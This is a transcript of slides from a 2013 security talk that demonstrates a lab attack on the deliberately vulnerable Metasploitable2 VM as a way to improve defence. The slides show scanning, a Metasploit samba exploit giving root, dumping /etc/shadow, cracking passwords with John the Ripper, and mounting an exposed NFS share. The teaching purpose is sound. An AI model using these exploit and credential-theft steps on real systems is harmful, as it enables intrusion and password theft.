Handwritten Text Recognition for manuscripts and early printed texts
Â
The best defense is a good offense (April 2013 Presentation to Atlantic HTCIA chapter)
1. “Improving your defensive security posture with offensive security strategies”
Andrew Kozma
HTCIA, Atlantic Chapter
Meeting April 18th, 2013
2. A bit about me…
ď‚ž Infosec professional working in healthcare
ď‚ž Co-founder of AtlSecCon
ď‚ž Midnight ethical hacker
ď‚ž A perpetual student
ď‚ž Security researcher/philosopher
ď‚ž Fan of the blues (Secretly want to learn how to play the harmonica)
3. Offensive Security
 “How much can you know about yourself if you've never been in
a fight?”
~Chuck Palahniuk, Fight Club
ď‚ž Hacking our own infrastructure to improve defensive security
measures and processes
 Tools – Kali Linux, a security distro maintained by Offensive-
Security with all the tools required to test security, it’s free and
always will be
 Tactics – The application of tools
 Strategy – The big picture, all the pieces working together to
achieve an ultimate goal
4. Creating a practice environment
 “The first rule of fight club is, you don't talk about fight club.”
~Chuck Palahniuk, Fight Club
ď‚ž The goal - a controlled environment where it is safe to
practice offensive security techniques
ď‚ž There are many vulnerable distributions that can serve as
targets to help build skills (@g0tmi1k’s www.vulnhub.com)
ď‚ž With proper planning and authorization along with an
understanding of the risks you can test production
infrastructure
ď‚ž Virtualization is a beautiful thing!
5.
6. Demo (metasploitable2)
ď‚ž NMAP Scan
ď‚— Identify OS, Services and open ports
ď‚ž Nessus Vuln Scan
ď‚— Run a scan to find vulnerabilities that can potentially be
exploited
ď‚ž Metasploit console
ď‚— Import the info
ď‚— Exploit the target
ď‚ž Post exploitation
ď‚— Crack passwords with john
ď‚— PWN the box
7. Demo (nmap)
• Scanning with nmap
-O OS Detection
-sV Service Version
-sC NSE Scripts
-oX Output in xml format
--stylesheet nmap.xsl
--open
--reason
• Copying the stylesheet to our
working directory
• Displaying the nmap scan in
Iceweasel (Kali-Linux Browser)
9. Demo (Nessus)
• Nessus Vulnerability Scanner
• Not native to Kali-Linux
• Download and install
• dpkg –i “filename”
• Register for Home feed (free)
• Connect to Local host port 8834
• Login and select new scan
10. Demo (Nessus)
• Launch the scan
• Nessus indicates the scan
progress
• A summary is displayed
once the scan is complete
13. Demo (metasploit)
• Opening the Metasploit
Framework Console
• Enter the command
“msfconsole”
• Importing our nmap scan
results into the metasploit
database
• Enter the command
“db_import /path to the
nmap scan”
14. Demo (metasploit)
• We can validate the
db_import by entering the
command “hosts” at the msf
prompt
• We can also validate the
services imported for that
host from nmap by entering
the command “services” at an
msf prompt.
15. Demo (metasploit)
• Import the nessus scan into
metasploit with command
“db_import /path to the file”
• Now that it is imported into
metasploit we can view the
vulnerabilities that nessus
detected with the command
“vulns”
16. Demo (metasploit)
• For this demo we are going to
exploit samba
• Load the exploit in msf with the
command:
“use exploit/multi/samba/usermap_script”
• Once the exploit is loaded we can
learn more about its functions via
the command “info”
17. Demo (metasploit)
• The command:
“show options” indicates
any variables that require
a value to be set
• For this exploit a Remote
Host is required to be
identified. We will use the
command:
“set RHOST target.ip.address”
• A payload that will be
delivered to the target is
required we issue the
command “set PAYLOAD
cmd/unix/bind/netcat”
18. Demo (metasploit)
• The command “show options” now
indicates the variables for RHOST
and PAYLOAD that we previously
defined
19. Demo (metasploit)
• We attack the target via the
command “exploit”
• Booyah! Shell access to the target!
• We have root level access to the
target and interact via this shell
• Let’s display the target systems
user accounts via the command
“cat /etc/passwd”
• We are going to select the data
displayed and copy it to a .txt file
20. Demo (metasploit)
• Now we need to grab the
hashes associated with the user
accounts we just viewed
• This can be done by displaying
the hashes via the command
“cat /etc/shadow”
• Once again we will be selecting
the information displayed and
will be copying it to a .txt file
22. Demo (John The Ripper)
• We are going to use John The
Ripper to crack the passwords for
the user accounts
• For John to crack them we have
to combine the usernames and
their hash into a format that John
can understand
• We combine both files to a single
one for John to crack with the
command: “unshadow
/path/passwd.txt /path/shadow.txt
> unshadowed.txt”
• We now have a file with
usernames and hashes that John
can use
23. Demo (John The Ripper)
• We are going to take a quick peek
at the contents of the new file
• To do this we change to directory
the file resides in “cd HTCIA”
• We can display the contents of this
file in the terminal with the
command “cat unshadowed.txt”
24. Demo (John The Ripper)
• To start cracking the password
with John we issue the
command: “john /path to the
filename.txt”
• John has loaded the hashes
and has successfully cracked
some of the passwords
• Previously cracked passwords
can be viewed with the
command: “john –show /Path
to the file.txt”
25. Demo (Post Exploitation)
• Using our new creds to SSH to
the exploited workstation
• To connect via SSH we use the
command: “ssh –l msfadmin
Target.IP.Address”
• Now we have a terminal session
vs a shell
• In the real world we could
continue to install backdoors,
steal data, pivot to scan for other
hosts
26. Demo (Post Exploitation)
• Lets review other services so that we can maintain a persistent
presence on the compromised workstation
• Hmmm NFS services are running on the target…
27. Demo (Post Exploitation)
• Lets take a quick look at
the NFS share available
on the target
• Uh oh… everything is
shared
• We are going to create a
temp directory and then
mount the share in it
• Lets display the filesystem
to see the NFS share
mounted in temp
28. Demo (Post Exploitation)
• Looking into the share that we
mounted…
• We already know we can copy the
contents of the passwd and
shadow files again
29. Demo (Post Exploitation)
• Remember our Nessus output
• Collect as much information as
possible during the information
gathering phase…
• Sometimes you get lucky! The
VNC server password was
identified in the scan by Nessus
30. Breaking things to make them better
 “At the time, my life just seemed too complete, and maybe we
have to break everything to make something better out of
ourselves.” ~Chuck
Palahniuk, Fight Club
ď‚ž When you start looking at production systems it is important to
have a demonstrated, repeatable process that has buy in from
management
ď‚ž Document your findings indicating the threat, the likelihood of
occurrence and the impact to the business
ď‚ž Use this information to build business cases for investment in
security solutions
 When you start looking at the production environment… there
will be blood….
31.
32. Advanced Persistent Response
 “On a long enough time line, the survival rate for everyone
drops to zero.” ~Chuck Palahniuk, Fight Club
ď‚ž Understanding trends and current threats
ď‚ž Filling in the gaps with security (Technology and process)
ď‚ž Creating and implementing a security model that meets
organizational needs
33. Incident Response
 "With a gun barrel between your teeth, you speak only in vowels.“
~Chuck Palahniuk, Fight Club
ď‚ž Preparation
ď‚— Have a plan, know who to call and when
ď‚ž Identification
ď‚— Determination of whether or not there was an incident
ď‚ž Containment
 Protecting other critical systems “stop the bleeding”
ď‚ž Eradication
ď‚— Addressing the vulnerabilities that were exploited
ď‚ž Recovery
ď‚— Returning to operational status
ď‚ž Follow up
ď‚— Lessons learned, prevent future incidents of the same nature
34. Parting thoughts
ď‚ž Do you still think the best defense is a
good offense?
ď‚ž IMHO ~ A good offense helps to make a
great defense! (with proper planning and execution)
35. References
ď‚ž Jeremy Druin @webpwnized has a great tutorial online going into more detail:
http://www.youtube.com/watch?v=0fbBwGAuINw
ď‚ž @netbiosx has a tutorial available online regarding NFS and metasploitable2:
http://pentestlab.wordpress.com/2013/01/20/nfs-misconfiguration/
ď‚ž Nessus software and home feed licensing can be found on their site:
http://www.tenable.com/
ď‚ž Kali-Linux can be obtained at www.kali.org and is maintained by Offensive-Security
ď‚ž Metasploitable2 is maintained by Rapid7 and is available for download from:
https://community.rapid7.com/docs/DOC-1875
ď‚ž Why stop here! There are many other distros to help expand your skillset, check out
@g0tmi1k and his website at http://vulnhub.com/